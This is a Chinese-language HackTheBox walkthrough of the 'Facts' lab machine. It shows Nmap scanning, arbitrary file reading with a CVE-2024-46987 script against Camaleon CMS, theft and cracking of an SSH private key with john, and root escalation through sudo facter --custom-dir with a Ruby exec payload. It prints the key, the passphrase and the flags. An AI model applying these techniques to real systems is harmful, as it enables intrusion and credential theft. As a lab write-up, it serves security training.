HTB-Facts

HackTheBox
, ,

Nmap

Nmap扫描端口

1
2
3
4
5
6
7
8
9
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts]
└─$ sudo nmap -p- --min-rate 10000 10.129.35.87 -oA nmapscans/ports
Nmap scan report for facts.htb (10.129.35.87)
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
54321/tcp open  unknown

开放了22、80、54321端口

CVE-2024-46987

访问web页面,根据网站的CSS/JS路径:/assets/themes/camaleon_first/可知网站采用Camaleon CMS搭建。

访问admin目录,可以注册登录。经过Google发现Camaleon CMS后台存在任意文件读取,在github下载脚本https://github.com/Goultarde/CVE-2024-46987。

利用注册的账号进行文件读取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
usbmux:x:100:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:103:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:104:104::/nonexistent:/usr/sbin/nologin
uuidd:x:105:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:106:107::/nonexistent:/usr/sbin/nologin
tss:x:107:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:108:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash
_laurel:x:101:988::/var/log/laurel:/bin/false

存在两个可登录的用户

1
2
trivia:x:1000:1000:facts.htb:/home/trivia:/bin/bash
william:x:1001:1001::/home/william:/bin/bash

读取user.txt

1
2
3
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/william/user.txt
6ef5c0d422fc224e982adbed988d1d44

Foothold

读取ssh密钥,尝试读取id_rsa没能读到。在AI的提示下读了authorized_keys文件

1
2
3
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/trivia/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJZbWGFe1ScRexbSkkCg7IBVrlxhzJKCC433yUP75zSe

这里可以看到私钥加密类型是ed25519,可以读取id_ed25519

1
2
3
4
5
6
7
8
9
10
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ python3 CVE-2024-46987.py -u http://facts.htb/ -l 123 -p 123 /home/trivia/.ssh/id_ed25519     
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBponzeuN
I0RdixIiDl7OfQAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIJZbWGFe1ScRexbS
kkCg7IBVrlxhzJKCC433yUP75zSeAAAAoA2DmipF8Ybf8uWSGxCGTIcNZxH0sznfDeLdKY
DF7gkgE1h7qv2V4hF3Oll5ke0tct2peCZTIPJC28lJK57knHmbaXy+v30T6RWzE+xiK7U+
d/CmZ4tQKCjLpquSinfxckgpeOPjeQSd8AQHCUqU0xV8ddtFCxJzSnrEO29izgDIOjexn0
66JLUXKgCTwL9mfM5pZIn6ssoPZWg+9Om1Tk4=
-----END OPENSSH PRIVATE KEY-----

将其保存在本地,然后ssh连接服务器。

1
2
3
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ ssh trivia@10.129.3.9 -i id_ed25519                                                      
Enter passphrase for key 'id_ed25519':

这里发现私钥被加密了,使用john爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ ssh2john id_ed25519 > ssh_hash     
                                                                                                                                                                                                
┌──(kali👻Thr2on1)-[~/Websec/HTB/Facts/CVE-2024-46987]
└─$ john ssh_hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz      (id_ed25519)     
1g 0:00:00:52 DONE (2026-02-14 00:08) 0.01920g/s 61.44p/s 61.44c/s 61.44C/s billy1..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

然后再次尝试登录并输入密钥

1
2
trivia@facts:~$ id
uid=1000(trivia) gid=1000(trivia) groups=1000(trivia)

ROOT

查看可能的提权路径

1
2
3
4
5
6
7
trivia@facts:~$ sudo -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter

trivia可以执行/usr/bin/facter命令,facter是Puppet用于收集系统facts的工具。

其中--custom-dir参数用来指定自定义脚本所在的目录并加载它,以此来收集自定义的facts信息。

生成恶意ruby脚本

1
echo 'exec("/bin/bash")' > root.rb

执行facter命令

1
2
3
4
5
6
trivia@facts:~$ sudo facter --custom-dir .
root@facts:/home/trivia# id
uid=0(root) gid=0(root) groups=0(root)
root@facts:/home/trivia# cat /root/root.txt 
bc3d9b8d771cd78fdcc1591c7219ec33
root@facts:/home/trivia#